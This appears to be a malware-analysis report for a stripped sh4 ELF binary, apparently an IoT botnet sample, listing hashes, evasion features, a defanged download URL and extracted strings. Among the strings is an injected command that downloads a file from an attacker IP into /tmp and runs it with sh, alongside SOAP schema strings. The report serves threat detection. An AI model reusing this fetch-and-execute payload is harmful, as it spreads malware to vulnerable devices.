db0fa4b8db0333367e9bda3ab68b8042.sh4

First submission 2024-10-16 20:56:02

File details

File type: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
Mime type: application/x-executable
File size: 75.0 KB (76796 bytes)
MD5: 54872dc62dd149b2c8daf83a6bd02e59
SHA1: 60f9e3e17d06e59159d296d98cdb1ff33f022690
SHA256: b255718290402fc3dae01d3968bf910102b76cd5d01e1ef33ed7929aa05f3172

File features detected

Is DLL
Packers
Anti Debug
Anti VM
Signed
XOR

URLs, FQDN and IP indicators 1

URL Host (FQDN/IP) Date Added
hXXp://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4 VirusTotal Report 87.236.95.134 VirusTotal Report 2024-10-16 20:56:02

Strings analysis - Possible IPs found 2

172.236.29.44
127.0.0.1

Strings analysis - Possible URLs found 3

http://schemas.xmlsoap.org/soap/encoding/
http://schemas.xmlsoap.org/soap/envelope/
http://172.236.29.44/bin+-O+/tmp/gaf;sh+/tmp/gaf